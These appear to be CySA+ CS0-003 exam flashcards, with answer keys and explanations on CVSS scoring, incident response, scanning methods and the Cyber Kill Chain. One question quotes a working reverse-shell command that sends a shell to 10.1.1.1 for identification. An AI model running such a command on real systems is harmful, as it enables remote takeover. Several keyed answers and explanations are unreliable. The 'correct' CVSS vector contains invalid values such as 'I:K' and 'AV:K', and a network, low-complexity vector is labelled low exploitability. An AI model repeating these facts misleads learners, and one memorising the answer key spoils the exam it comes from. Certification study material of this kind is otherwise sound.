CS0-003 (FOURPEAT) Flashcards
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?
A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Correct Answer: A
A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): None (UI:N)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): Known (I:K)
Availability Impact (A): Low (A:L)
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
Attack Vector (AV): Adjacent Network (AV:K)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): High (PR:H)
User Interaction (UI): Required (UI:R)
Scope (S): Changed (S:C)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): High (I:H)
Availability Impact (A): Low (A:L)
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): Required (UI:H)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: Low (C:L)
Integrity Impact (I): None (I:N)
Availability Impact (A): High (A:H)
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Attack Vector (AV): Local (AV:L)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): Required (PR:R)
User Interaction (UI): Required (UI:R)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): Low (I:L)
Availability Impact (A): High (A:H)
These vectors provide information about the severity of security vulnerabilities. They consider factors like attack vectors, complexity, privileges required, user interaction, and impact on confidentiality, integrity, and availability. If you have any specific questions about these vectors or need further clarification, feel free to ask! 😊
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
A. PAM
B. IDS
C. PKI
D. DLP
Correct Answer: D
The best tool for preventing the exposure of Personally Identifiable Information (PII) outside of an organization is DLP (Data Loss Prevention).
DLP solutions help monitor, detect, and prevent sensitive data from being leaked or transmitted to unauthorized recipients. They can enforce policies to safeguard PII, such as credit card numbers, Social Security numbers, and other confidential information.
IDS (Intrusion Detection System) detects network threats.
PKI (Public Key Infrastructure) manages digital certificates for secure communication.
PAM (Privileged Access Management) focuses on controlling access to critical systems and accounts.
Which of the following items should be included in a vulnerability scan report? (Choose two.)
A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan
Correct Answer: D, E
D. Affected hosts: Definitely! This information helps pinpoint where vulnerabilities exist.
E. Risk score: Yes, including the risk score provides context on the severity of each vulnerability.
Items like “Lessons learned,” “Service-level agreement,” “Playbook,” and “Education plan” are not typically part of a vulnerability scan report. They might be relevant for other security documentation but aren’t directly related to scan results.
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing
Correct Answer: A
Response - Incident response activities include detection, analysis, containment, eradication, recovery, communication, and documentation.
Remediation - Remediation activities include applying patches, fixing misconfigurations, updating security policies, improving access controls, and implementing other corrective measures.
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?
A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
D. An error was caused by BGP due to new rules applied over the company’s internal routers
Correct Answer: B
Based on the information provided, it seems that option B is the most likely scenario.
An on-path attack by an internal actor could be forcing users to connect via port 80 (HTTP) instead of port 443 (HTTPS). This manipulation could compromise security by intercepting or redirecting traffic. It’s essential for the company to investigate further and take appropriate measures to secure their network and user accounts.
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
- The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
- In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
- The Company shall prioritize patching of publicly available systems and services over patching of internally available system.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
A. Name: THOR.HAMMER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System
Correct Answer: B
CAP.SHIELD
Based on the security policy’s criteria, vulnerabilities B (CAP.SHIELD) and D (THANOS.GAUNTLET) have the highest priority in patching because they have the highest impact on confidentiality, which takes precedence over availability.
B. CAP.SHIELD - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (External System)
Exploitability: Low
Impact: High (Confidentiality)
Patching Priority: Highest
D. THANOS.GAUNTLET - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (Internal System)
Exploitability: Low
Impact: High (Confidentiality)
Patching Priority: Highest
According to the policy, external systems should be prioritized over internal systems.
Therefore, vulnerability B should be addressed first.
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
A. Business continuity plan
B. Vulnerability management plan
C. Disaster recovery plan
D. Asset management plan
Correct Answer: A
The goal of the business continuity program is to ensure that the organization is able to
maintain normal operations even during an unexpected event. When an incident strikes,
business continuity controls may protect the business’ core functions from disruption.
The goal of the disaster recovery program is to help the organization quickly recover
normal operations if they are disrupted. An incident may cause service disruptions that
would trigger the disaster recovery plan.
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications
Correct Answer: A
Deploy a CASB and enable policy enforcement (Option A): A Cloud Access Security Broker (CASB) acts as an intermediary between users and cloud services. It provides visibility into cloud usage, enforces security policies, and helps prevent unauthorized access. By deploying a CASB and enforcing policies, you can gain better control over cloud applications and reduce the risk associated with shadow IT.
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
A. CDN
B. Vulnerability scanner
C. DNS
D. Web server
Correct Answer: C
Given that the organization was impacted by a DDoS attack, the team should review the DNS logs first. DNS (Domain Name System) logs can provide valuable information about the domain resolution process, including any unusual or malicious requests. Analyzing DNS logs can help identify patterns associated with the attack and provide insights into the source of the traffic. Once the DNS logs have been reviewed, the team can proceed to examine other relevant logs, such as web server logs or CDN logs, to further investigate the incident.
A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?
A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation
Correct Answer: D
The current stage of the Cyber Kill Chain that the threat actor is operating in is D. Exploitation. At this stage, the attacker has successfully exploited a vulnerability or weakness to gain unauthorized access to the network. Their goal is to maintain access and continue their attack.
An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?
A. Exploitation
B. Reconnaissance
C. Command and control
D. Actions on objectives
Correct Answer: B
The analyst is witnessing the reconnaissance phase. During this stage, attackers gather information about their target, which often includes scanning external-facing assets to identify vulnerabilities. It’s a critical step before launching an attack.
An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)
A. Beaconing
B. Domain Name System hijacking
C. Social engineering attack
D. On-path attack
E. Obfuscated links
F. Address Resolution Protocol poisoning
Correct Answer: C, E
- Social Engineering Attack (C): This seems likely. Targeting only administrators with a concealed URL could be an attempt to manipulate them into clicking the link, potentially compromising their credentials or installing malicious software.
- Obfuscated Links (E): Concealing the URL suggests obfuscation. Cybercriminals often use obfuscated links to evade detection by security tools and trick users into visiting malicious sites.
The other options are less relevant in this context. Beaconing (A) typically refers to a compromised system communicating with a command-and-control server. Domain Name System (DNS) hijacking (B) involves redirecting DNS queries to malicious servers. On-path attacks (D) and Address Resolution Protocol (ARP) poisoning (F) are less likely explanations for this scenario.
Remember to investigate further and take appropriate action to protect your network. If you need additional assistance, feel free to ask!
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
A. Conduct regular red team exercises over the application in production
B. Ensure that all implemented coding libraries are regularly checked
C. Use application security scanning as part of the pipeline for the CI/CD flow
D. Implement proper input validation for any data entry form
Correct Answer: C
To mitigate recurring vulnerabilities in a critical application throughout the software development lifecycle (SDLC), Use application security scanning as part of the pipeline for the CI/CD flow.
Here’s why:
Continuous Integration/Continuous Deployment (CI/CD): Integrating security scanning into the CI/CD pipeline ensures that security checks are performed automatically during each stage of development, from code commits to deployment. This approach catches vulnerabilities early and prevents them from propagating to production.
Automation: By automating security scans, you reduce the reliance on manual testing, which can be error-prone and time-consuming. Automated scans can identify common vulnerabilities (such as injection flaws, cross-site scripting, and insecure configurations) consistently and efficiently.
Shift Left: Incorporating security scanning early in the SDLC (the “shift left” approach) allows developers to address vulnerabilities during coding and testing phases. This proactive approach prevents issues from reaching production.
While options A, B, and D are also important, they address different aspects of security:
A (Red Team Exercises): Useful for assessing overall security posture but not necessarily for identifying specific recurring vulnerabilities.
B (Checking Coding Libraries): Important for maintaining library hygiene but doesn’t directly address the recurring vulnerabilities.
D (Input Validation): Essential for preventing specific types of vulnerabilities (e.g., injection attacks), but it’s not a comprehensive solution for all recurring issues.
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows
Correct Answer: A
The systems that cannot be upgraded due to a vendor appliance represent proprietary systems. These appliances are likely tightly integrated with the critical systems, making it difficult to apply updates or patches.
Unlike legacy systems, which are older but still supported, proprietary systems often lack the flexibility to accommodate standard upgrades.
Unsupported operating systems, on the other hand, refer to those that no longer receive security updates from their vendors.
The issue here seems to be the proprietary nature of the vendor appliance, hindering the necessary upgrades.
Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
A. Develop a call tree to inform impacted users
B. Schedule a review with all teams to discuss what occurred
C. Create an executive summary to update company leadership
D. Review regulatory compliance with public relations for official notification
Correct Answer: B
Conducting a thorough review involving all relevant teams allows for knowledge sharing, identification of gaps, and process improvements. It promotes collaboration and learning from the incident.
A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing
Correct Answer: B
Given the scenario, static analysis is often the first step. It allows the analyst to identify suspicious patterns, check for hardcoded credentials, and understand the binary’s behavior without executing it. If further investigation is needed, reverse engineering becomes valuable.
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address
Correct Answer: D
When preserving sensitive information before isolating a server, the routing table (option D) should be collected first. The routing table contains critical network configuration details, which can help identify potential attack vectors and compromised routes. By capturing this information early, the incident response team can ensure that essential data is preserved for further analysis.
Which of the following security operations tasks are ideal for automation?
A. Suspicious file analysis:
Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder
B. Firewall IoC block actions:
Examine the firewall logs for IoCs from the most recently published zero-day exploit. Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules
C. Security application user errors:
Search the error logs for signs of users having trouble with the security application. Look up the user’s phone number - Call the user to help with any questions about using the application
D. Email header analysis:
Check the email header for a phishing confidence metric greater than or equal to five. Add the domain of sender to the block list. Move the email to quarantine
Correct Answer: B
Analyzing firewall logs for Indicators of Compromise (IoCs) is a common security task. Automation can efficiently process large log volumes, identify patterns, and trigger blocking rules.
Automation feasibility: Highly feasible (commonly automated).
D could end up adding common email domains to the block list and limit communication that is unintended.
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
A. PCI Security Standards Council
B. Local law enforcement
C. Federal law enforcement
D. Card issuer
Correct Answer: D
Under the terms of the Payment Card Industry Data Security Standard (PCI DSS), an organization that experiences a breach of customer transactions should report the breach to the card issuer.
The card issuer is responsible for handling the incident and notifying the appropriate parties, including law enforcement if necessary.
The other options—such as the PCI Security Standards Council, local law enforcement, and federal law enforcement—may also be involved in the investigation, but the primary reporting responsibility lies with the card issuer.
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts
Correct Answer: A
Given the recent investments in SIEM (Security Information and Event Management), SOAR (Security Orchestration, Automation, and Response), and a ticketing system, the best metric for an organization to focus on would be the mean time to detect (MTTD).
MTTD measures the average time it takes to identify and respond to security incidents. A shorter MTTD indicates a more efficient detection and response process, which is crucial for minimizing the impact of security threats.
While other metrics (such as alert volume, quantity of intrusion attempts, and number of exploits by tactic) provide valuable insights, MTTD directly reflects the effectiveness of the security infrastructure and processes. It helps organizations assess their ability to detect and mitigate threats promptly.
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
A. The current scanners should be migrated to the cloud
B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan IaaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud
Correct Answer: B
Cloud-Specific Misconfigurations: Traditional vulnerability scanners may not fully detect cloud-specific misconfigurations. Cloud environments have unique security challenges, such as misconfigured permissions, network settings, and storage access. Ensure your vulnerability management tools account for these cloud-specific issues.
Migration of Scanners: While migrating your current scanners to the cloud (Option A) is an option, it’s essential to evaluate whether they are optimized for cloud environments. Some scanners may need adjustments or replacements to effectively scan cloud resources.
Vulnerability Scans from the Cloud: Performing vulnerability scans directly from the cloud (Option D) is recommended. This approach ensures that scans originate within the same environment, providing accurate results and minimizing network latency.
Coverage for IaaS Systems: Existing vulnerability scanners can indeed scan IaaS systems (Option C).
However, ensure they are configured correctly to assess cloud-based infrastructure. Consider integrating cloud-native security tools for comprehensive coverage.
A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?
A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional
Correct Answer: B
When conducting an investigation related to HR or privacy matters, it’s crucial to handle the process carefully.
Here are some steps to ensure compliance and safeguard privacy:
Privacy and Confidentiality: During investigations, employees have the right to privacy and confidentiality. Information shared during the investigation should only be disclosed on a need-to-know basis. This ensures that sensitive details remain confidential and protects the privacy of all parties involved.
Given the options, B aligns with best practices for maintaining privacy. By ensuring that case details do not include user-identifiable information and restricting access to authorized personnel, you can protect privacy while conducting a thorough investigation.
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disaster
C. Demonstrate adherence to a standard disaster recovery process
D. Identify applications to be run during a disaster
Correct Answer: A
A. Agree on the goals and objectives of the plan as the first step when establishing a disaster recovery plan (DRP). While conducting a risk analysis is crucial, defining the goals and objectives ensures alignment with business needs and sets the direction for the entire plan. Once you have clear objectives, you can proceed with other essential steps in the DRP process.
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?
A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass
Correct Answer: D
The security program achieved this improvement by implementing a Single pane of glass approach. By integrating security controls into a SIEM (Security Information and Event Management) system, the analyst no longer needed to switch between multiple tools. This unified view streamlined incident response and reduced Mean Time to Respond (MTTR).
A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
A. Testing
B. Implementation
C. Validation
D. Rollback
Correct Answer: C
You test the patch in a sandbox environment before you apply it, and after you apply it, you validate.
When starting an investigation, which of the following must be done first?
A. Notify law enforcement
B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses
Correct Answer: B
Securing the scene is typically the first step in an investigation. It ensures that evidence remains undisturbed and allows investigators to proceed methodically. Once the scene is secure, they can then proceed with other steps, such as collecting evidence and interviewing witnesses.
Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any t me
D. Subject matter experts on the team should communicate with others within the specified area of expertise
Correct Answer: A
The Computer Security Incident Response Team (CSIRT) lead plays a crucial role in determining communication during a security incident.
Here’s how they typically approach it:
Reviewing Incident Response Plan (IRP): The lead should start by reviewing the organization’s incident response policy or plan. This document outlines the procedures, roles, and responsibilities during incidents. It helps guide communication decisions based on predefined protocols1.
Analyzing the Incident:
The CSIRT analyzes the incident to determine:
Scope: Which users, systems, and services are impacted.
Origin: Who or what caused the incident.
Occurrence: Which attack methods are being used or vulnerabilities exploited.
Internal Communications:
The lead manages internal communications during or immediately after incidents. This includes updates to team members and relevant stakeholders.
They work closely with other team leads (e.g., legal, data protection, communications) to ensure effective communication across the organization.
In summary, the CSIRT lead relies on the IRP, collaborates with other teams, and ensures timely and accurate communication throughout the incident response process.
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?
A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists
Correct Answer: C
Let’s break down the options:
Firewall logs: These logs capture network traffic and can provide insights into attempted connections, blocked traffic, and potential threats. While they are valuable for monitoring network activity, they might not directly produce the high-level executive briefing data needed.
Indicators of compromise (IoCs): IoCs are specific artifacts or patterns associated with known threats (e.g., malicious IP addresses, file hashes, domain names). Collecting IoCs from threat intelligence feeds can help identify potential threats. However, IoCs alone may not provide a comprehensive view for an executive briefing.
Risk assessment: Risk assessments evaluate the likelihood and impact of various threats to an organization. They consider vulnerabilities, threat actors, and potential consequences. Conducting a risk assessment can yield valuable data for an executive briefing, especially when prioritizing security efforts.
Access control lists (ACLs): ACLs define permissions for network resources (e.g., who can access specific servers or services). While ACLs are essential for security, they focus on access control rather than broader threat analysis.
Given the context of creating an executive briefing:
C. Risk assessment. It provides a holistic view of threats, vulnerabilities, and their potential impact, aligning well with executive-level decision-making.
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal
Correct Answer: A
The behavior described by the analyst is beaconing. Beaconing refers to a pattern where a compromised device or software communicates with a command-and-control (C2) server at regular intervals, often with additional data or specific patterns in the communication.
In this case, the device is sending HTTPS traffic with extra characters in the header to a known-malicious IP address.
This behavior is typical of beaconing, which allows the attacker to maintain control over the compromised system and receive instructions or updates. The other options (cross-site scripting, buffer overflow, and PHP traversal) are not directly related to this specific behavior.
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port==20
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option
Correct Answer: C
The ftp-data display filter specifically captures the data channel of the FTP session, which contains the actual file transfer data.
By following the TCP streams associated with the ftp-data filter, the analyst can reconstruct the entire file transfer, including the files being downloaded.
Options A and B are not relevant in this context:
Option A (ftp.active.port) refers to the active mode port for FTP connections, which is not related to viewing file contents.
Option B (tcp.port==20) filters packets based on the destination port 20, which is used for FTP data connections in active mode. However, this won’t show the complete file transfer data.
Option D is incorrect:
Navigating to the File menu and selecting FTP from the Export objects option allows exporting FTP objects (such as files) from the capture, but it doesn’t directly show the contents of the downloaded files.
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
A. SLA
B. MOU
C. NDA
D. Limitation of liability
Correct Answer: A
The SOC (Security Operations Center) manager should review the Service Level Agreement (SLA). The SLA outlines the agreed-upon response times, including how quickly vulnerabilities should be addressed and remediated. It ensures that the team meets contractual obligations related to incident response and vulnerability management. The SLA typically specifies response times for different severity levels of incidents, which helps maintain customer satisfaction and adherence to contractual commitments.
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery
Correct Answer: A
The phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target is A. Command and control. During this phase, the attacker establishes a channel for remote control and communication with the compromised system. This allows them to issue commands, exfiltrate data, and maintain persistence.
The Cyber Kill Chain is a framework that explains how attackers move through networks to identify vulnerabilities and exploit them. It’s essential for understanding the stages of a cyberattack and implementing preventive measures. Here are the seven stages:
Reconnaissance: In this initial stage, attackers research potential targets, identify vulnerabilities, and explore existing entry points. Both online and offline methods are used.
Weaponization: After reconnaissance, attackers create malware specifically tailored for the identified target. This could involve modifying existing tools or developing new ones.
Delivery: Cyberweapons are used to infiltrate the target’s network. This can happen through phishing emails with malware attachments or exploiting hardware/software vulnerabilities.
Exploitation: Attackers take advantage of discovered vulnerabilities to further infiltrate the network. They may move laterally across the network to reach their targets.
Installation: Malware is installed on the compromised system, allowing attackers to maintain access and control.
Command and Control (C2): Attackers establish communication channels to control the compromised system remotely. This step enables ongoing operations.
Actions on Objectives: Finally, attackers achieve their goals, which could include data theft, disruption, or other malicious activities12.
Feel free to ask if you’d like more details or need assistance with anything else! 😊
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Correct Answer: B
Reduced network traffic: Pre-installed agents reduce the need for frequent network scans, replacing them with event-driven or periodic scheduled scans.
No IP limitation: Agent-based scanning is not limited by IP, making it accessible even for assets using dynamic addressing or located off-site behind private subnets.
Geographically distributed environments: Agent-based scanning works well in widely distributed environments or with numerous remote employees1.
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
Correct Answer: B
sh -i: This part of the command invokes the Bourne shell (sh) with an interactive session (-i).
> & /dev/udp/10.1.1.1/4821: The >& redirects both standard output and standard error to the specified UDP address (10.1.1.1) and port (4821).
0>$l: This redirects standard input (0) to an undefined variable ($l).
In a reverse shell attack, the attacker sets up a listener on their machine (in this case, the UDP address 10.1.1.1), and the compromised system connects back to the attacker, allowing them to execute commands remotely.
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
A. Scope
B. Weaponization
C. CVSS
D. Asset value
Correct Answer: B
Weaponization refers to the actual use of an exploit to deliver a payload or cause harm.
In this case, the exploit being actively used to deliver ransomware significantly increases the severity of the vulnerability.
Other factors, such as scope, CVSS (Common Vulnerability Scoring System), and asset value, may also play a role, but weaponization is the primary reason for the score escalation.
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning
Correct Answer: C
Agent-based scanning involves installing a lightweight software agent on each endpoint. These agents perform the vulnerability assessment locally on the device, thereby not requiring remote access to sensitive data. The results are then sent back to a centralized server for analysis.
A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
A. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }
B. function x() { info=$(ping -c 1 $1 | awk -F “/” ’END{print $5}’) && echo “$1 | $info” }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1} ‘).origin.asn.cymru.com TXT +short) && echo “$1 | $info” }
D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }
Correct Answer: D
To identify anomalies on the network routing accurately, the security analyst should use a function that can help in gathering information related to the network routing of a given IP address. Among the provided options, the most suitable function for this purpose is:
D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }
Explanation:
This function uses the “traceroute” command with a maximum hop count of 40 to trace the route to the target IP address.
The “awk ‘END{print $1}’” command is used to extract the last hop or router in the route, which can be valuable for identifying anomalies or unexpected routing paths.
Finally, it echoes the target IP address and the last hop/router in the route as output, which can help the analyst identify any unexpected or suspicious routing behavior.
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?
A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management
Correct Answer: B
While other options (such as step-up authentication for administrators, password complexity standards, and mobile device management) are important for overall security, they may not directly address the specific issue of sensitive information leakage via file sharing services. Employee awareness and training, on the other hand, directly mitigate this risk by promoting responsible behavior and informed decision-making.
A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?
A. Upload the binary to an air gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal
Correct Answer: A
This approach allows the analyst to analyze the binaries without exposing them to the internet, ensuring that no information is inadvertently revealed to the attackers.
By using an air-gapped environment, the analyst can safely examine the malware’s behavior and characteristics while maintaining confidentiality.
The other options (sending binaries to an antivirus vendor, executing them in an internet-connected environment, or querying file hashes using VirusTotal) may inadvertently leak information or compromise the investigation.
So, option A is the most suitable choice in this scenario.
Which of the following is the best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach?
A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics
Correct Answer: A
Understanding your audience’s level of expertise and familiarity with cybersecurity concepts will help tailor the content appropriately. Once you have that clarity, you can proceed with creating an effective report.
Which of the following would help to minimize human engagement and aid in process improvement in security operations?
A. OSSTMM
B. SIEM
C. SOAR
D. OWASP
Correct Answer: C
SOAR (Security Orchestration, Automation, and Response) provides automation, orchestration, and predictive capabilities to strengthen security operations and reduce reliance on manual processes. It’s a powerful tool for minimizing human engagement and improving efficiency
Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
A. Identify any improvements or changes in the incident response plan or procedures
B. Determine if an internal mistake was made and who did it so they do not repeat the error
C. Present all legal evidence collected and turn it over to law enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent
Correct Answer: A
A. This is crucial. After an incident, it’s essential to evaluate what went well and what could be improved. Adjustments to the incident response plan or procedures can enhance future incident handling.
B. While identifying internal mistakes is important, the primary focus should be on learning and preventing recurrence rather than assigning blame. Understanding the root cause helps prevent similar errors.
C. This step is relevant for legal and law enforcement purposes. It ensures that evidence is properly documented and handed over to the appropriate authorities.
D. While financial impact assessment is valuable, it’s not typically part of the lessons-learned process. However, it’s essential for overall security management.
The most relevant choice for the lessons-learned step is option A. Identifying improvements and changes ensures continuous improvement in incident response.
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?
A. Avoid
B. Transfer
C. Accept
D. Mitigate
Correct Answer: A
The Chief Information Security Officer (CISO) in this scenario selected the “Avoid” risk management principle. By refusing the software request due to a high risk score, the CISO is actively avoiding the potential risks associated with implementing the software.
Other risk management principles include transferring (such as through insurance or outsourcing), accepting (acknowledging and managing the risk), and mitigating (reducing the impact of the risk).
The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?
A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication
Correct Answer: A
